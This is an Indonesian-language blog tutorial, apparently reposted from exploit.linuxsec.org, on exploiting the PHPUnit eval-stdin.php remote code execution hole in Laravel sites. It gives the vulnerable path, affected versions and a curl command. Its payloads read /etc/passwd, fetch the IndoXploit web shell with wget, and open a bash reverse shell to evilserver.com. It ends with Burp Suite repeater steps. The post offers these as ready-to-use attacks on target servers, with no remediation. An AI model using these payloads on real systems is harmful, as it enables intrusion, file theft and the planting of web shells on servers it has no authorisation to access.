Bartes Dwiky
Admin

Online Tools

2019-12-18

Laravel PHPUnit Remote Code Execution

Bartes Dwiky »
Bartes Dwiky
Foto :
  • Laravel PHPUnit Remote Code Execution
Laravel PHPUnit Remote Code Execution
yX Media - Monetize your website traffic with us

© CCP - Programmers –

  • Vuln: eval-stdin.php
  • Full Path Exploit : http://target/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • Affected versions : Before 4.8.28 and 5.x before 5.6.3

Disini kalian bebas untuk mengirim datanya menggunakan Burp Suite, Postman, atau curl pun bisa. Disini saya share yang pake curl dulu karena menurut saya ini yang paling simple.

Gunakan parameter -d atau –data untuk mengirim payloadnya. Payload yang bisa digunakan:

 

<?php system('tail /etc/passwd'); ?>
<?php echo php_uname(); ?>
<?php show_source('/etc/passwd'); ?>

 

Contoh command:

curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

 

Kalau ingin spawn shell ya tinggal diubah payloadnya menjadi wget misalnya:

<?php system('wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php'; ?>

 

Atau diubah ke perintah untuk backconnect:

<?php system('bash -i >& /dev/tcp/evilserver.com/666 0>&1');?>

 

Lalu di evil server dilisten ke port 666.

https://exploit.linuxsec.org/wp-content/uploads/2019/06/connected-768x108.png

Atau, kalian bisa menggunakan Burpsuite.

Intercept, lalu kirim requestnya ke repeater.

burp

Lalu klik menu Repeater, masukkan payloadnya dibawah, dan klik tombol Go.

burpUntuk responnya bisa dilihat di sebelah kolom request (sebelah kanan).

burp

Oke mungkin itu saja tutorial kali ini, sekian dan semoga bermanfaat.

Source : https://exploit.linuxsec.org/laravel-phpunit-remote-code-execution/